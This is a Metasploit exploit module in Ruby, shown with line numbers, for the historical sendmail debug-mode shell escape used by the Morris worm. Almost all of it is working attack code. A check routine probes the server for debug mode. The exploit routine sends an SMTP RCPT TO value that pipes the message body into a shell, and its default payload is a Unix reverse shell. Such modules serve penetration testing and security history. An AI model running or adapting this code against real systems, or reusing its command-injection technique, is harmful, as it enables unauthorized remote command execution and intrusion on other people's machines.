CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7

8
  # cmd/unix/reverse spams the session with Telnet codes on EOF
9
  Rank = AverageRanking
10

11
  include Msf::Exploit::Remote::Tcp
12
  include Msf::Exploit::Remote::Expect
13
  prepend Msf::Exploit::Remote::AutoCheck
14

15
  def initialize(info = {})
16
    super(update_info(info,
17
      'Name'           => 'Morris Worm sendmail Debug Mode Shell Escape',
18
      'Description'    => %q{
19
        This module exploits sendmail's well-known historical debug mode to
20
        escape to a shell and execute commands in the SMTP RCPT TO command.
21

22
        This vulnerability was exploited by the Morris worm in 1988-11-02.
23
        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
24

25
        Currently, only cmd/unix/reverse and cmd/unix/generic are supported.
26
      },
27
      'Author'         => [
28
        'Robert Tappan Morris', # Exploit and worm for sure
29
        'Cliff Stoll',          # The Cuckoo's Egg inspiration
30
        'wvu'                   # Module and additional research
31
      ],
32
      'References'     => [
33
        ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'],         # History
34
        ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'],  # Analysis
35
        ['URL', 'https://github.com/arialdomartini/morris-worm'],     # Source
36
        ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
37
      ],
38
      'DisclosureDate' => '1988-11-02',
39
      'License'        => MSF_LICENSE,
40
      'Platform'       => 'unix',
41
      'Arch'           => ARCH_CMD,
42
      'Privileged'     => false, # DefUid in src/conf.c, usually "daemon"
43
      'Payload'        => {'Compat' => {'RequiredCmd' => 'generic telnet'}},
44
      'Targets'        => [
45
        # https://en.wikipedia.org/wiki/Source_Code_Control_System
46
        ['@(#)version.c       5.51 (Berkeley) 5/2/86', {}]
47
      ],
48
      'DefaultTarget'  => 0,
49
      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}
50
    ))
51

52
    register_options([Opt::RPORT(25)])
53

54
    register_advanced_options([
55
      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
56
    ])
57
  end
58

59
  def check
60
    checkcode = CheckCode::Safe
61

62
    connect
63
    res = sock.get_once
64

65
    return CheckCode::Unknown unless res
66

67
    if res =~ /^220.*Sendmail/
68
      checkcode = CheckCode::Detected
69
    end
70

71
    sock.put("DEBUG\r\n")
72
    res = sock.get_once
73

74
    return checkcode unless res
75

76
    if res.start_with?('200 Debug set')
77
      checkcode = CheckCode::Appears
78
    end
79

80
    checkcode
81
  rescue EOFError, Rex::ConnectionError => e
82
    vprint_error(e.message)
83
    CheckCode::Unknown
84
  ensure
85
    disconnect
86
  end
87

88
  def exploit
89
    # We don't care who the user is, so randomize it
90
    from = rand_text_alphanumeric(8..42)
91

92
    # Strip mail headers with sed(1), pass to sh(1), and ensure a clean exit
93
    to = %("| sed '1,/^$/d' | sh; exit 0")
94

95
    # We don't have $PATH, so set one
96
    path = '/bin:/usr/bin:/usr/ucb:/etc'
97

98
    sploit = {
99
      nil                   => /220.*Sendmail/,
100
      'DEBUG'               => /200 Debug set/,
101
      "MAIL FROM:<#{from}>" => /250.*Sender ok/,
102
      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
103
      'DATA'                => /354 Enter mail.*itself/,
104
      # Indent PATH= so it's not interpreted as a mail header
105
      " PATH=#{path}"       => nil,
106
      'export PATH'         => nil,
107
      payload.encoded       => nil,
108
      '.'                   => /250 Ok/,
109
      'QUIT'                => /221.*closing connection/
110
    }
111

112
    print_status('Connecting to sendmail')
113
    connect
114

115
    print_status('Enabling debug mode and sending exploit')
116
    sploit.each do |line, pattern|
117
      send_expect(
118
        line,
119
        pattern,
120
        sock:    sock,
121
        timeout: datastore['ExpectTimeout'],
122
        newline: "\r\n"
123
      )
124
    end
125
  rescue Rex::ConnectionError => e
126
    fail_with(Failure::Unreachable, e.message)
127
  rescue Timeout::Error => e
128
    fail_with(Failure::TimeoutExpired, e.message)
129
  ensure
130
    disconnect
131
  end
132

133
  def on_new_session(session)
134
    print_warning("Do NOT type `exit', or else you may lose further shells!")
135
    print_warning('Hit ^C to abort the session instead, please and thank you')
136
  end
137

138
end
139

140